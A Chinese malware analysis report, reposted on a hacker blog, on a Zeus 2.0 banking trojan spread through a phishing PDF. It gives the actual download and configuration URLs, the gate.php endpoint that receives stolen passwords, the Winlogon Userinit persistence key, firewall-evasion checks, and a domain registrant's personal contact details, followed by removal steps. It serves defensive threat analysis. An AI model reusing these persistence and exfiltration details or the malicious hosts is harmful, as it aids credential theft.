记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

银行大盗及窃取密码-ZUES(宙斯)木马分析报告

2015-08-11 06:40
原始样本文件:XXX.pdf   获取时间:北京时间2011-11-11上午
一:PDF文件分析
    样本文件XXX.pdf经过详细分析,未发现PDF文件的溢出类漏洞、shellcode、exp,打开文件后发现内容中采用欺骗钓鱼的方法伪装防病毒软件提供给用户下载。其中下载连接指向的是非XXX.com网站,而是指向http://clujatnight.ro/templates/beez/update.zip 伪装的地址,这种方法为黑客鱼叉式攻击常用的一种手段之一。
伪装地址域名通过查询显示 clujatnight.ro 域名指向的IP为208.109.51.55 美国
 
如下图:
银行大盗及窃取密码-ZUES(宙斯)木马分析报告 - 第1张  | Sec-UN 安全圈
根据PDF中的文字描述信息,通过分析基本确定为钓鱼类具有针对性的入侵行为。
二:分析过程
从上面提供的下载地址下载update.zip 压缩包
 
clujatnight.ro服务器返回的信息如下:
 
 
HTTP/1.1 200 OK
Date: Sun, 13 Nov 2011 17:23:38 GMT
Server: Apache/2.0.54 (Fedora)
Last-Modified: Thu, 10 Nov 2011 14:18:24 GMT
ETag: "258007-18ff2-13cdac00"
Accept-Ranges: bytes
Content-Length: 102386
Connection: close
Content-Type: application/zip
 
网站上返回的信息说明:
样本上传时间应为2011-11-10 14:18:24(即:北京时间 2011-11-10 22:18:24)
 
查看压缩包结果为:
银行大盗及窃取密码-ZUES(宙斯)木马分析报告 - 第2张  | Sec-UN 安全圈
银行大盗及窃取密码-ZUES(宙斯)木马分析报告 - 第3张  | Sec-UN 安全圈
 
 
从样本时间以及获取的PDF文件时间上临近性分析,此木马应为针对此次攻击所使用的
(从原始PDF来源中应该能查询出一些相关信息)
使用peid探壳查看update.exe发现其做了加壳处理
 
加壳入口点为: 0000962F
探测结果: 未知壳
脱壳后文件详见:脱壳update.exe.txt
三:木马样本分析
1. 启动方式及注册表键值
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Userinit"="C:\\WINDOWS\\system32\\userinit.exe,C:\\WINDOWS\\system32\\sdra64.exe,"
 
2. 木马驻留方式
复制自身到系统目录下,文件名为sdra64.exe
文件被隐藏,即使在资源管理器中设置显示隐藏属性也不会被显示出来
并且文件时间被设置为和系统文件ntdll.dll一样的时间
银行大盗及窃取密码-ZUES(宙斯)木马分析报告 - 第4张  | Sec-UN 安全圈
 
在系统目录下新建目录 lowsec,其中有三个文件分别为:
local.ds 所下载的木马配置信息
user.ds 、user.ds.lll,经分析内容为木马配置信息和获取的本机的帐户类信息,做了加密处理
 
银行大盗及窃取密码-ZUES(宙斯)木马分析报告 - 第5张  | Sec-UN 安全圈
 
3. 进程隐藏 和 防杀处理
程序启动后,注入远程线程到系统进程winlogon.exe中
 
查找“outpost.exe”,“zlclient.exe”进程, 如果存在则运行相关代码试图躲避查杀。
outpost.exe是俄罗斯的Outpost Personal Firewall个人防火墙相关程序
zlclient.exe是Zonelabs的防火墙相关程序
4. 网络
木马注入到 winlogon.exe 进程中的线程执行后会访问及下载
http://www.104ktai.com/free/site/templates_c/m2hzum.bin
文件,此文件经分析为木马窃取本机密码或种植其它木马程序的配置文件。
文件生成配置的时间为:2011-11-10 11:29:48(北京时间2011-11-10 19:29:48)
GET /free/site/templates_c/m2hzum.bin HTTP/1.1
Accept: */*
Connection: Close
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; InfoPath.2)
Host: www.104ktai.com
Cache-Control: no-cache
 
HTTP/1.1 200 OK
Date: Sun, 13 Nov 2011 16:19:36 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: Toshin=123.62.73.49.1321201176659847; path=/; expires=Sun, 13-Nov-11 16:49:36 GMT
Last-Modified: Thu, 10 Nov 2011 11:29:48 GMT
ETag: "4c4cf-a257-b8d7c300"
Accept-Ranges: bytes
Content-Length: 41559
Connection: close
Content-Type: application/octet-stream
Set-Cookie: B_SEID=191146176.20480.0000; expires=Sun, 13-Nov-2011 16:49:36 GMT; path=/
 
5. 木马会把窃取到的密码及一些信息发送至
http://chtwup.com/temp_hd8/zf465ghg/gate.php
 
POST /temp_hd8/zf465ghg/gate.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E)
Host: chtwup.com
Content-Length: 267
Connection: Keep-Alive
Cache-Control: no-cache
 
脱壳后的木马可以看到一些如下获取帐户信息的字符串:
PopOpO03-3331111   注:(pop3)邮件的接收服务器
cookie: ie_cookies
software\webmoney
WMKeeper
Password: 等等
 
其他域名:
scooter.web.tr 、howbankingworks.ie、www.toshinshikoku.com
四:域名注册信息
IP:173.192.232.137/Dallas     美国德克萨斯州达拉斯市SoftLayer科技公司
域名:chtwup.com
注册商:
DIRECTI INTERNET SOLUTIONS PVT. LTD. D/B/A PUBLICDOMAINREGISTRY.COM
DNS 服务器:
NS19.NVHSERVER.COM, NS20.NVHSERVER.COM
注册日期:11-oct-2011
到期日期:11-oct-2012
 
域名注册信息
查询地址:http://www.publicdomainregistry.com/whois-process/
 
Name: Aron Moseson
Company: N/A 
Address: 
769 Empire Avenue 
769 Empire Avenue 
City: Far Rockaway 
State: New York 
Country: US 
Zip: 11691 
Tel No: 1 12163922272 
Mail: starglobesx@yahoo.com
 
五:查杀方法
查看注册表
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Userinit"="C:\\WINDOWS\\system32\\userinit.exe,C:\\WINDOWS\\system32\\sdra64.exe,"
发现 有C:\WINDOWS\system32\sdra64.exe,则说明已种此木马
可以用冰刃的文件管理功能强制删除sdra64.exe,并重启系统后,删除注册表项和lowsec目录
 
六:木马说明
经分析验证此木马为一款名为zeus的2.0版本
解密后的配置信息(m2hzum.bin)如下:
 
见:config.txt
银行大盗及窃取密码-ZUES(宙斯)木马分析报告 - 第6张  | Sec-UN 安全圈
总结性分析:
1.木马名称:zeus 2.0 版
2.木马功能:
窃取受感染计算机上的个人数据和帐户信息及下载各类所需的木马程序
3.木马释放文件:
C:\WINDOWS\system32\sdra64.exe   木马主体文件
C:\WINDOWS\system32\lowsec\local.ds  注此文件为m2hzum.bin配置文件改名后文件C:\WINDOWS\system32\lowsec\user.ds   保存窃取用户密码信息
C:\WINDOWS\system32\lowsec\user.ds.lll 保存窃取用户密码类信息
4.木马会把窃取到的密码及个人数据发送至
http://chtwup.com/temp_hd8/zf465ghg/gate.php
5.查杀方法
查看注册表
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Userinit"="C:\\WINDOWS\\system32\\userinit.exe,C:\\WINDOWS\\system32\\sdra64.exe,"
发现 有C:\\WINDOWS\\system32\\sdra64.exe,则说明已种此木马
可以用冰刃或xuetr的文件管理功能强制删除sdra64.exe,并重启系统后,删除注册表项和lowsec目录
6.木马域名:
详见对m2hzum.bin木马配置文件解密后的config.txt文件。

知识来源: www.sec-un.org/bank-robber-and-steal-passwords-zues-zeus-trojan-analysis.html

阅读:340647 | 评论:0 | 标签:安全威胁情报

想收藏或者和大家分享这篇好文章→复制链接地址

“银行大盗及窃取密码-ZUES(宙斯)木马分析报告”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

❤人人都能成为掌握黑客技术的英雄⛄️

ADS

标签云

本页关键词